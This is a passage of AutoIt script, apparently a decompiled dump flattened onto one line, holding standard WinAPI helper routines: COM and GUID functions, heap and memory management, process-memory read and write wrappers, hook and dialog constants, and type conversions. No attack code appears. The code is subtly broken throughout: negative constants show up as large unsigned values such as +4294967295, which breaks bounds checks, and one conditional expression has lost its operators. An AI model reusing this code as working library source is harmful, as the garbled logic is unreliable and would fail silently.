($ICODE , $STEXT = "" ) IF $STEXT THEN MSGBOX ($MB_SYSTEMMODAL , "AutoIt" , $STEXT ) DLLCALL ("kernel32.dll" , "none" , "FatalExit" , "int" , $ICODE ) ENDFUNC FUNC __INC (BYREF $ADATA , $IINCREMENT = 100 ) SELECT CASE UBOUND ($ADATA , $UBOUND_COLUMNS ) IF $IINCREMENT < 0 THEN REDIM $ADATA [$ADATA [0 ] [0 ] + 1 ] [UBOUND ($ADATA , $UBOUND_COLUMNS ) ] ELSE $ADATA [0 ] [0 ] += 1 IF $ADATA [0 ] [0 ] > UBOUND ($ADATA ) + 4294967295 THEN REDIM $ADATA [$ADATA [0 ] [0 ] + $IINCREMENT ] [UBOUND ($ADATA , $UBOUND_COLUMNS ) ] ENDIF ENDIF CASE UBOUND ($ADATA , $UBOUND_ROWS ) IF $IINCREMENT < 0 THEN REDIM $ADATA [$ADATA [0 ] + 1 ] ELSE $ADATA [0 ] += 1 IF $ADATA [0 ] > UBOUND ($ADATA ) + 4294967295 THEN REDIM $ADATA [$ADATA [0 ] + $IINCREMENT ] ENDIF ENDIF CASE ELSE RETURN 0 ENDSELECT RETURN 1 ENDFUNC FUNC __RGB ($ICOLOR ) IF $__G_IRGBMODE THEN $ICOLOR = _WINAPI_SWITCHCOLOR ($ICOLOR ) ENDIF RETURN $ICOLOR ENDFUNC FUNC __WINVER () LOCAL $TOSVI = DLLSTRUCTCREATE ($TAGOSVERSIONINFO ) DLLSTRUCTSETDATA ($TOSVI , 1 , DLLSTRUCTGETSIZE ($TOSVI ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetVersionExW" , "struct*" , $TOSVI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN BITOR (BITSHIFT (DLLSTRUCTGETDATA ($TOSVI , 2 ) , + 4294967288 ) , DLLSTRUCTGETDATA ($TOSVI , 3 ) ) ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $__TAGWINAPICOM_GUID = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CLSIDFROMPROGID ($SPROGID ) LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CLSIDFromProgID" , "wstr" , $SPROGID , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) $ARETURN = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 39 ) IF @ERROR OR NOT $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_COINITIALIZE ($IFLAGS = 0 ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CoInitializeEx" , "ptr" , 0 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_COTASKMEMALLOC ($ISIZE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "ptr" , "CoTaskMemAlloc" , "uint_ptr" , $ISIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARETURN [0 ] ENDFUNC FUNC _WINAPI_COTASKMEMFREE ($PMEMORY ) DLLCALL ("ole32.dll" , "none" , "CoTaskMemFree" , "ptr" , $PMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_COTASKMEMREALLOC ($PMEMORY , $ISIZE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "ptr" , "CoTaskMemRealloc" , "ptr" , $PMEMORY , "ulong_ptr" , $ISIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARETURN [0 ] ENDFUNC FUNC _WINAPI_COUNINITIALIZE () DLLCALL ("ole32.dll" , "none" , "CoUninitialize" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_CREATEGUID () LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CoCreateGuid" , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) $ARETURN = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 65536 ) IF @ERROR OR NOT $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_CREATESTREAMONHGLOBAL ($HGLOBAL = 0 , $BDELETEONRELEASE = TRUE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CreateStreamOnHGlobal" , "handle" , $HGLOBAL , "bool" , $BDELETEONRELEASE , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN $ARETURN [3 ] ENDFUNC FUNC _WINAPI_GETHGLOBALFROMSTREAM ($PSTREAM ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "uint" , "GetHGlobalFromStream" , "ptr" , $PSTREAM , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_PROGIDFROMCLSID ($SCLSID ) LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "uint" , "CLSIDFromString" , "wstr" , $SCLSID , "struct*" , $TGUID ) IF @ERROR OR $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) $ARETURN = DLLCALL ("ole32.dll" , "uint" , "ProgIDFromCLSID" , "struct*" , $TGUID , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) LOCAL $SID = _WINAPI_GETSTRING ($ARETURN [2 ] ) _WINAPI_COTASKMEMFREE ($ARETURN [2 ] ) RETURN $SID ENDFUNC FUNC _WINAPI_RELEASESTREAM ($PSTREAM ) LOCAL $ARETURN = DLLCALL ("oleaut32.dll" , "long" , "DispCallFunc" , "ptr" , $PSTREAM , "ulong_ptr" , 8 * (1 + @AUTOITX64 ) , "uint" , 4 , "ushort" , 23 , "uint" , 0 , "ptr" , 0 , "ptr" , 0 , "str" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions GLOBAL CONST $HGDI_ERROR = PTR (+ 4294967295 ) GLOBAL CONST $INVALID_HANDLE_VALUE = PTR (+ 4294967295 ) GLOBAL CONST $CLR_INVALID = + 4294967295 GLOBAL CONST $MB_PRECOMPOSED = 1 GLOBAL CONST $MB_COMPOSITE = 2 GLOBAL CONST $MB_USEGLYPHCHARS = 4 GLOBAL CONST $ULW_ALPHA = 2 GLOBAL CONST $ULW_COLORKEY = 1 GLOBAL CONST $ULW_OPAQUE = 4 GLOBAL CONST $ULW_EX_NORESIZE = 8 GLOBAL CONST $WH_CALLWNDPROC = 4 GLOBAL CONST $WH_CALLWNDPROCRET = 12 GLOBAL CONST $WH_CBT = 5 GLOBAL CONST $WH_DEBUG = 9 GLOBAL CONST $WH_FOREGROUNDIDLE = 11 GLOBAL CONST $WH_GETMESSAGE = 3 GLOBAL CONST $WH_JOURNALPLAYBACK = 1 GLOBAL CONST $WH_JOURNALRECORD = 0 GLOBAL CONST $WH_KEYBOARD = 2 GLOBAL CONST $WH_KEYBOARD_LL = 13 GLOBAL CONST $WH_MOUSE = 7 GLOBAL CONST $WH_MOUSE_LL = 14 GLOBAL CONST $WH_MSGFILTER = + 4294967295 GLOBAL CONST $WH_SHELL = 10 GLOBAL CONST $WH_SYSMSGFILTER = 6 GLOBAL CONST $WPF_ASYNCWINDOWPLACEMENT = 4 GLOBAL CONST $WPF_RESTORETOMAXIMIZED = 2 GLOBAL CONST $WPF_SETMINPOSITION = 1 GLOBAL CONST $KF_EXTENDED = 256 GLOBAL CONST $KF_ALTDOWN = 8192 GLOBAL CONST $KF_UP = 32768 GLOBAL CONST $LLKHF_EXTENDED = BITSHIFT ($KF_EXTENDED , 8 ) GLOBAL CONST $LLKHF_INJECTED = 16 GLOBAL CONST $LLKHF_ALTDOWN = BITSHIFT ($KF_ALTDOWN , 8 ) GLOBAL CONST $LLKHF_UP = BITSHIFT ($KF_UP , 8 ) GLOBAL CONST $OFN_ALLOWMULTISELECT = 512 GLOBAL CONST $OFN_CREATEPROMPT = 8192 GLOBAL CONST $OFN_DONTADDTORECENT = 33554432 GLOBAL CONST $OFN_ENABLEHOOK = 32 GLOBAL CONST $OFN_ENABLEINCLUDENOTIFY = 4194304 GLOBAL CONST $OFN_ENABLESIZING = 8388608 GLOBAL CONST $OFN_ENABLETEMPLATE = 64 GLOBAL CONST $OFN_ENABLETEMPLATEHANDLE = 128 GLOBAL CONST $OFN_EXPLORER = 524288 GLOBAL CONST $OFN_EXTENSIONDIFFERENT = 1024 GLOBAL CONST $OFN_FILEMUSTEXIST = 4096 GLOBAL CONST $OFN_FORCESHOWHIDDEN = 268435456 GLOBAL CONST $OFN_HIDEREADONLY = 4 GLOBAL CONST $OFN_LONGNAMES = 2097152 GLOBAL CONST $OFN_NOCHANGEDIR = 8 GLOBAL CONST $OFN_NODEREFERENCELINKS = 1048576 GLOBAL CONST $OFN_NOLONGNAMES = 262144 GLOBAL CONST $OFN_NONETWORKBUTTON = 131072 GLOBAL CONST $OFN_NOREADONLYRETURN = 32768 GLOBAL CONST $OFN_NOTESTFILECREATE = 65536 GLOBAL CONST $OFN_NOVALIDATE = 256 GLOBAL CONST $OFN_OVERWRITEPROMPT = 2 GLOBAL CONST $OFN_PATHMUSTEXIST = 2048 GLOBAL CONST $OFN_READONLY = 1 GLOBAL CONST $OFN_SHAREAWARE = 16384 GLOBAL CONST $OFN_SHOWHELP = 16 GLOBAL CONST $OFN_EX_NOPLACESBAR = 1 GLOBAL CONST $STD_CUT = 0 GLOBAL CONST $STD_COPY = 1 GLOBAL CONST $STD_PASTE = 2 GLOBAL CONST $STD_UNDO = 3 GLOBAL CONST $STD_REDOW = 4 GLOBAL CONST $STD_DELETE = 5 GLOBAL CONST $STD_FILENEW = 6 GLOBAL CONST $STD_FILEOPEN = 7 GLOBAL CONST $STD_FILESAVE = 8 GLOBAL CONST $STD_PRINTPRE = 9 GLOBAL CONST $STD_PROPERTIES = 10 GLOBAL CONST $STD_HELP = 11 GLOBAL CONST $STD_FIND = 12 GLOBAL CONST $STD_REPLACE = 13 GLOBAL CONST $STD_PRINT = 14 GLOBAL CONST $KB_SENDSPECIAL = 0 GLOBAL CONST $KB_SENDRAW = 1 GLOBAL CONST $KB_CAPSOFF = 0 GLOBAL CONST $KB_CAPSON = 1 GLOBAL CONST $S_OK = 0 GLOBAL CONST $E_ABORT = 2147500036 GLOBAL CONST $E_ACCESSDENIED = 2147942405 GLOBAL CONST $E_FAIL = 2147500037 GLOBAL CONST $E_HANDLE = 2147942406 GLOBAL CONST $E_INVALIDARG = 2147942487 GLOBAL CONST $E_NOINTERFACE = 2147500034 GLOBAL CONST $E_NOTIMPL = 2147500033 GLOBAL CONST $E_OUTOFMEMORY = 2147942414 GLOBAL CONST $E_POINTER = 2147500035 GLOBAL CONST $E_UNEXPECTED = 2147549183 #Region Global Variables and Constants GLOBAL $__G_HHEAP = 0 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEBUFFER ($ILENGTH , $PBUFFER = 0 , $BABORT = TRUE ) $PBUFFER = __HEAPREALLOC ($PBUFFER , $ILENGTH , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $PBUFFER ENDFUNC FUNC _WINAPI_CREATEBUFFERFROMSTRUCT ($TSTRUCT , $PBUFFER = 0 , $BABORT = TRUE ) IF NOT ISDLLSTRUCT ($TSTRUCT ) THEN RETURN SETERROR (1 , 0 , 0 ) $PBUFFER = __HEAPREALLOC ($PBUFFER , DLLSTRUCTGETSIZE ($TSTRUCT ) , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR + 100 , @EXTENDED , 0 ) _WINAPI_MOVEMEMORY ($PBUFFER , $TSTRUCT , DLLSTRUCTGETSIZE ($TSTRUCT ) ) RETURN $PBUFFER ENDFUNC FUNC _WINAPI_CREATESTRING ($SSTRING , $PSTRING = 0 , $ILENGTH = + 4294967295 , $BUNICODE = TRUE , $BABORT = TRUE ) $ILENGTH = NUMBER ($ILENGTH ) IF $ILENGTH >= 0 THEN $SSTRING = STRINGLEFT ($SSTRING , $ILENGTH ) ELSE $ILENGTH = STRINGLEN ($SSTRING ) ENDIF LOCAL $ISIZE = $ILENGTH + 1 IF $BUNICODE THEN $ISIZE *= 2 ENDIF $PSTRING = __HEAPREALLOC ($PSTRING , $ISIZE , 0 , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) DLLSTRUCTSETDATA (DLLSTRUCTCREATE (($BUNICODE "wchar" "char" ) & "[" & ($ILENGTH + 1 ) & "]" , $PSTRING ) , 1 , $SSTRING ) RETURN SETEXTENDED ($ILENGTH , $PSTRING ) ENDFUNC FUNC _WINAPI_EQUALMEMORY ($PSOURCE1 , $PSOURCE2 , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PSOURCE1 , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) IF _WINAPI_ISBADREADPTR ($PSOURCE2 , $ILENGTH ) THEN RETURN SETERROR (12 , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "ulong_ptr" , "RtlCompareMemory" , "struct*" , $PSOURCE1 , "struct*" , $PSOURCE2 , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN NUMBER ($ARET [0 ] = $ILENGTH ) ENDFUNC FUNC _WINAPI_FILLMEMORY ($PMEMORY , $ILENGTH , $IVALUE = 0 ) IF _WINAPI_ISBADWRITEPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlFillMemory" , "struct*" , $PMEMORY , "ulong_ptr" , $ILENGTH , "byte" , $IVALUE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FREEMEMORY ($PMEMORY ) IF NOT __HEAPFREE ($PMEMORY , 1 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_GETMEMORYSIZE ($PMEMORY ) LOCAL $IRESULT = __HEAPSIZE ($PMEMORY , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $IRESULT ENDFUNC FUNC _WINAPI_GLOBALMEMORYSTATUS () LOCAL CONST $TAGMEMORYSTATUSEX = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual" LOCAL $TMEM = DLLSTRUCTCREATE ($TAGMEMORYSTATUSEX ) DLLSTRUCTSETDATA ($TMEM , 1 , DLLSTRUCTGETSIZE ($TMEM ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GlobalMemoryStatusEx" , "struct*" , $TMEM ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $AMEM [7 ] $AMEM [0 ] = DLLSTRUCTGETDATA ($TMEM , 2 ) $AMEM [1 ] = DLLSTRUCTGETDATA ($TMEM , 3 ) $AMEM [2 ] = DLLSTRUCTGETDATA ($TMEM , 4 ) $AMEM [3 ] = DLLSTRUCTGETDATA ($TMEM , 5 ) $AMEM [4 ] = DLLSTRUCTGETDATA ($TMEM , 6 ) $AMEM [5 ] = DLLSTRUCTGETDATA ($TMEM , 7 ) $AMEM [6 ] = DLLSTRUCTGETDATA ($TMEM , 8 ) RETURN $AMEM ENDFUNC FUNC _WINAPI_ISBADCODEPTR ($PADDRESS ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadCodePtr" , "struct*" , $PADDRESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADREADPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadReadPtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADSTRINGPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadStringPtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISBADWRITEPTR ($PADDRESS , $ILENGTH ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsBadWritePtr" , "struct*" , $PADDRESS , "uint_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISMEMORY ($PMEMORY ) LOCAL $BRESULT = __HEAPVALIDATE ($PMEMORY ) RETURN SETERROR (@ERROR , @EXTENDED , $BRESULT ) ENDFUNC FUNC _WINAPI_LOCALFREE ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MOVEMEMORY ($PDESTINATION , $PSOURCE , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PSOURCE , $ILENGTH ) THEN RETURN SETERROR (10 , @EXTENDED , 0 ) IF _WINAPI_ISBADWRITEPTR ($PDESTINATION , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlMoveMemory" , "struct*" , $PDESTINATION , "struct*" , $PSOURCE , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_READPROCESSMEMORY ($HPROCESS , $PBASEADDRESS , $PBUFFER , $ISIZE , BYREF $IREAD ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "ReadProcessMemory" , "handle" , $HPROCESS , "ptr" , $PBASEADDRESS , "struct*" , $PBUFFER , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IREAD = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_WRITEPROCESSMEMORY ($HPROCESS , $PBASEADDRESS , $PBUFFER , $ISIZE , BYREF $IWRITTEN , $SBUFFER = "ptr" ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "WriteProcessMemory" , "handle" , $HPROCESS , "ptr" , $PBASEADDRESS , $SBUFFER , $PBUFFER , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IWRITTEN = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ZEROMEMORY ($PMEMORY , $ILENGTH ) IF _WINAPI_ISBADWRITEPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (11 , @EXTENDED , 0 ) DLLCALL ("ntdll.dll" , "none" , "RtlZeroMemory" , "struct*" , $PMEMORY , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __HEAPALLOC ($ISIZE , $BABORT = FALSE ) LOCAL $ARET IF NOT $__G_HHEAP THEN $ARET = DLLCALL ("kernel32.dll" , "handle" , "HeapCreate" , "dword" , 0 , "ulong_ptr" , 0 , "ulong_ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN __FATALEXIT (1 , "Error allocating memory." ) $__G_HHEAP = $ARET [0 ] ENDIF $ARET = DLLCALL ("kernel32.dll" , "ptr" , "HeapAlloc" , "handle" , $__G_HHEAP , "dword" , 8 , "ulong_ptr" , $ISIZE ) IF @ERROR OR NOT $ARET [0 ] THEN IF $BABORT THEN __FATALEXIT (1 , "Error allocating memory." ) RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC __HEAPFREE (BYREF $PMEMORY , $BCHECK = FALSE , $ICURERR = @ERROR , $ICUREXT = @EXTENDED ) IF $BCHECK AND (NOT __HEAPVALIDATE ($PMEMORY ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "HeapFree" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 40 , @EXTENDED , 0 ) $PMEMORY = 0 RETURN SETERROR ($ICURERR , $ICUREXT , 1 ) ENDFUNC FUNC __HEAPREALLOC ($PMEMORY , $ISIZE , $BAMOUNT = FALSE , $BABORT = FALSE ) LOCAL $ARET , $PRET IF __HEAPVALIDATE ($PMEMORY ) THEN IF $BAMOUNT AND (__HEAPSIZE ($PMEMORY ) >= $ISIZE ) THEN RETURN SETEXTENDED (1 , PTR ($PMEMORY ) ) $ARET = DLLCALL ("kernel32.dll" , "ptr" , "HeapReAlloc" , "handle" , $__G_HHEAP , "dword" , 8 , "ptr" , $PMEMORY , "ulong_ptr" , $ISIZE ) IF @ERROR OR NOT $ARET [0 ] THEN IF $BABORT THEN __FATALEXIT (1 , "Error allocating memory." ) RETURN SETERROR (@ERROR + 20 , @EXTENDED , PTR ($PMEMORY ) ) ENDIF $PRET = $ARET [0 ] ELSE $PRET = __HEAPALLOC ($ISIZE , $BABORT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) ENDIF RETURN $PRET ENDFUNC FUNC __HEAPSIZE ($PMEMORY , $BCHECK = FALSE ) IF $BCHECK AND (NOT __HEAPVALIDATE ($PMEMORY ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "ulong_ptr" , "HeapSize" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR OR ($ARET [0 ] = PTR (+ 4294967295 ) ) THEN RETURN SETERROR (@ERROR + 50 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC __HEAPVALIDATE ($PMEMORY ) IF (NOT $__G_HHEAP ) OR (NOT PTR ($PMEMORY ) ) THEN RETURN SETERROR (9 , 0 , FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "HeapValidate" , "handle" , $__G_HHEAP , "dword" , 0 , "ptr" , $PMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC #EndRegion Internal Functions GLOBAL CONST $SND_APPLICATION = 128 GLOBAL CONST $SND_ALIAS = 65536 GLOBAL CONST $SND_ALIAS_ID = 1114112 GLOBAL CONST $SND_ASYNC = 1 GLOBAL CONST $SND_FILENAME = 131072 GLOBAL CONST $SND_LOOP = 8 GLOBAL CONST $SND_MEMORY = 4 GLOBAL CONST $SND_NODEFAULT = 2 GLOBAL CONST $SND_NOSTOP = 16 GLOBAL CONST $SND_NOWAIT = 8192 GLOBAL CONST $SND_PURGE = 64 GLOBAL CONST $SND_RESOURCE = 262148 GLOBAL CONST $SND_SENTRY = 524288 GLOBAL CONST $SND_SYNC = 0 GLOBAL CONST $SND_SYSTEM = 2097152 GLOBAL CONST $SND_SYSTEM_NOSTOP = 2097168 GLOBAL CONST $SND_ALIAS_SYSTEMASTERISK = "SystemAsterisk" GLOBAL CONST $SND_ALIAS_SYSTEMDEFAULT = "SystemDefault" GLOBAL CONST $SND_ALIAS_SYSTEMEXCLAMATION = "SystemExclamation" GLOBAL CONST $SND_ALIAS_SYSTEMEXIT = "SystemExit" GLOBAL CONST $SND_ALIAS_SYSTEMHAND = "SystemHand" GLOBAL CONST $SND_ALIAS_SYSTEMQUESTION = "SystemQuestion" GLOBAL CONST $SND_ALIAS_SYSTEMSTART = "SystemStart" GLOBAL CONST $SND_ALIAS_SYSTEMWELCOME = "SystemWelcome" #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CHARTOOEM ($SSTR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CharToOemW" , "wstr" , $SSTR , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_CLIENTTOSCREEN ($HWND , BYREF $TPOINT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ClientToScreen" , "hwnd" , $HWND , "struct*" , $TPOINT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_DWORDTOFLOAT ($IVALUE ) LOCAL $TDWORD = DLLSTRUCTCREATE ("dword" ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" , DLLSTRUCTGETPTR ($TDWORD ) ) DLLSTRUCTSETDATA ($TDWORD , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TFLOAT , 1 ) ENDFUNC FUNC _WINAPI_DWORDTOINT ($IVALUE ) LOCAL $TDATA = DLLSTRUCTCREATE ("int" ) DLLSTRUCTSETDATA ($TDATA , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_FLOATTODWORD ($IVALUE ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" ) LOCAL $TDWORD = DLLSTRUCTCREATE ("dword" , DLLSTRUCTGETPTR ($TFLOAT ) ) DLLSTRUCTSETDATA ($TFLOAT , 1 , $IVALUE ) RETURN DLLSTRUCTGETDATA ($TDWORD , 1 ) ENDFUNC FUNC _WINAPI_FLOATTOINT ($NFLOAT ) LOCAL $TFLOAT = DLLSTRUCTCREATE ("float" ) LOCAL $TINT = DLLSTRUCTCREATE ("int" , DLLSTRUCTGETPTR ($TFLOAT ) ) DLLSTRUCTSETDATA ($TFLOAT , 1 , $NFLOAT ) RETURN DLLSTRUCTGETDATA ($TINT , 1 ) ENDFUNC FUNC _WINAPI_GETXYFROMPOINT (BYREF $TPOINT , BYREF $IX , BYREF $IY ) $IX = DLLSTRUCTGETDATA ($TPOINT , "X" ) $IY = DLLSTRUCTGETDATA ($TPOINT , "Y" ) ENDFUNC FUNC _WINAPI_GUIDFROMSTRING ($SGUID ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) _WINAPI_GUIDFROMSTRINGEX ($SGUID , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TGUID ENDFUNC FUNC _WINAPI_GUIDFROMSTRINGEX ($SGUID , $TGUID ) LOCAL $ARESULT = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_HASHDATA ($PMEMORY , $ISIZE , $ILENGTH = 32 ) IF ($ILENGTH <= 0 ) OR ($ILENGTH > 256 ) THEN RETURN SETERROR (11 , 0 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "uint" , "HashData" , "struct*" , $PMEMORY , "dword" , $ISIZE , "struct*" , $TDATA , "dword" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 